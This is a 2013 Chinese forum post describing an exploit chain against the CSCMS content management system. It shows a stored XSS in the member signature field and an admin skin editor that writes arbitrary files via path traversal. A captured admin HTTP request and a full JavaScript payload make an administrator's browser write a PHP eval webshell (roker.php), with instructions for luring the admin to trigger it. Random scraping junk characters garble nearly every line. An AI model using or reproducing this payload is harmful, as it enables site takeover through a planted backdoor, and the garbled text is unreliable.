|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
% e7 \3 c* f& |4 B官网已经修补了,所以重新下了源码
' B! U% w! J& t0 k# s {9 J3 a因为 后台登入 还需要认证码 所以 注入就没看了。
5 d8 ^+ G3 L/ k* V: h3 F存在 xss0 J3 k2 u' h+ e! p0 ^* E
漏洞文件 user/member/skin_edit.php% P! m: U9 I( \! b8 c6 D( Y
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
$ ?; G8 J, F4 S$ N% q 1 p- H: }! w1 Z+ u5 n
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
+ Z( D2 P) \" M) _
& Y4 h& ^" x Y J- ~1 u</textarea></td></tr>$ r9 o3 M* U+ }' F5 ^% U0 y/ m
! S9 [; t: |9 g, j: ]$ r7 y user/do.php
/ _+ M+ p& V% u p, x: C$ Q: j5 L: B3 b I: W) z1 z
1 C% a0 C2 i! A4 L3 ~. e
if($op=='zl'){ //资料1 f+ {5 v, t+ c) }: X
& r* N* C% _! o& G
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) 0 e8 m ^1 ~5 u* y- _8 f, D; a
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
% x0 c. z8 u& u# r+ w: D3 D" u & _: C) h9 _: e3 E0 o) f; l
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',; m8 ]* \0 `1 J% h
7 G( [- w' O/ ~" B3 @* O CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'' L. y3 B$ Z4 Z" x4 a7 F7 L
where CS_Name='".$cscms_name."'";; q5 `/ T& S4 J% o2 @/ N! ~: Y, b. N
7 a7 a1 `- ]. `" N0 b/ F if($db->query($sql)){
( y5 I! V6 N# n; l% ^! h" {+ B
1 |. g/ d7 y6 P exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);')); C6 _7 o }" H' U) w
* k6 C4 J+ P- H }& v, M! U
}else{
/ Y' @; x1 \! r1 w
4 V' i+ m7 ]4 R( J6 G) x exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
: F$ N( [8 x# J# X- s& i* I & O( s0 f8 r9 S# |- W3 v% |8 R- d
}
5 L# F0 b( n8 t, D$ S1 @' e V8 n1 Q
! F1 l% @$ ]; r0 P z* C* g1 S- B0 F; o
没有 过滤导致xss产生。" Y: d' ~3 [* p
后台 看了下 很奇葩的是可以写任意格式文件。。
2 B$ o* ~+ `4 ] l抓包。。
' F% c! t- z9 q/ r) M" {. y! k+ L4 ~! q" L1 q' ^1 f9 W$ ~5 l' V) E# z
1 @) _! j( g' J+ G& ?; c) v本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
8 U0 T" ^' {& k& F7 U
- r5 J: x. r9 y8 cAccept: text/html, application/xhtml+xml, */*( v6 B( ^0 u% `& f1 x9 ^: o9 }
- Z2 m5 e5 r1 s, T/ I; LReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
% E- N% T* x4 s7 R# |2 R5 w9 W ; V0 L( g* X9 u+ v4 D
Accept-Language: zh-CN
4 I% w2 V6 m q' g7 L 8 g2 `8 X& _" y9 q1 d# h0 o( |; `
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
- D' y" w0 O2 @ % X, V& e& _4 q) J+ E q
Content-Type: application/x-www-form-urlencoded
! R, ]" a/ _/ m
( ^& E" Y: ]! L% W/ t3 zAccept-Encoding: gzip, deflate5 }8 _2 }6 f4 f* [, f
/ A: j9 |$ f6 k2 GHost: 127.0.0.1& W: M, M t# {3 [+ V- F
1 { h) R& \4 YContent-Length: 386 _" N: K" u, f2 V- k$ z; @
3 y/ I5 `, w2 |# Q$ r/ n7 HDNT: 1* K) k' Q Y8 Y4 c; T1 i
6 l! a2 r: D7 H8 u9 t* vConnection: Keep-Alive2 x$ {; B( P1 D- H5 ~; X" e
! M7 Y; S- j" G* R8 g
Cache-Control: no-cache
: z% ]" Z' w# i+ G
) t/ s" F1 A5 y4 l3 L2 H0 y' X+ VCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655944 `- Y$ E, H! k& o# ]( Q9 q
/ h* |6 A0 r5 I' C k2 s
7 P% ^" q! `( h. c' Y ~( n' n
name=aaa.php&content=%3Cs%3E%3Ca%25%3E5 C9 `+ D {1 w- D- i( C2 a& n j9 w. J
! U1 R& V+ n' b- A, p8 ?; k) A
+ Y! I' T, M4 [' ? c: E
$ ~4 k- m. t( T. b于是 构造js如下。
% X8 L) A1 ~: C7 S5 m, K; u; I
, C) \8 }7 }1 w! Z& a$ X4 l9 I本帖隐藏的内容<script>
$ r& \1 j. b0 K; w( ethisTHost = top.location.hostname;4 g0 O% \/ a" v
O: ^% C/ J+ E1 ~! h5 D
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";9 R: e1 D" {" d; f7 F
% i( W- I5 p) f( S+ v
function PostSubmit(url, data, msg) {
5 L! U& r4 W; Y5 o+ o0 ~1 Q var postUrl = url;5 q6 k/ |7 g5 h/ _
8 b, R. I* C) B0 }+ m9 x var postData = data; ) n. U# n4 H: o2 Q C
var msgData = msg;
- H* a0 Y; V8 Z% ^7 `$ I var ExportForm = document.createElement("FORM");
' B$ f& o/ W3 ?( s document.body.appendChild(ExportForm); 5 K- _& L, O# }- t
ExportForm.method = "POST";
9 y& U) w1 N6 ]* m! J var newElement = document.createElement("input"); 1 |- _7 ~ I `8 N4 M$ R0 ~' D
newElement.setAttribute("name", "name"); + W8 m! p- L+ }* ?
newElement.setAttribute("type", "hidden");
) l4 I- m$ K( G$ D var newElement2 = document.createElement("input"); ) Q% k6 A8 {8 b: B# e" j6 x1 u
newElement2.setAttribute("name", "content");
5 c2 P6 K4 K8 M/ Y+ G( l* u newElement2.setAttribute("type", "hidden"); " P! X7 C# I z+ ?+ @% N: s8 _( J
ExportForm.appendChild(newElement);
- c6 f2 |' I0 q ExportForm.appendChild(newElement2); ! `& E! f! j; B1 j% L
newElement.value = postData;
I8 `6 n9 K2 Q3 N; \ newElement2.value = msgData;
5 Y3 o" g4 v( M. ]1 a3 }' \/ V3 `9 E) f ExportForm.action = postUrl;
0 }; l+ h8 g' w; @ D ExportForm.submit(); 4 ~, g( e6 ?* j2 q8 _
};
. {5 W M& {# a# q0 V' ` 6 `1 ^% {- e# e- n" \3 Q4 D: A
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
, B, e C0 J& d0 w ) A+ e; e2 t3 [7 ^+ a7 u$ ~
</script>
, G' K4 ?' j' ]4 A- J8 c! j. ~
0 Z4 a1 o# b- K
) X% Z8 M1 r4 U. _$ Phttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入; l e4 f$ H5 C* M0 H
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
0 L4 | e4 j0 b- g: L& s就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
! `- H; n' R8 t, _, h9 o
|
|
发表于 2013-11-6 18:09:37
收藏
分享
支持
反对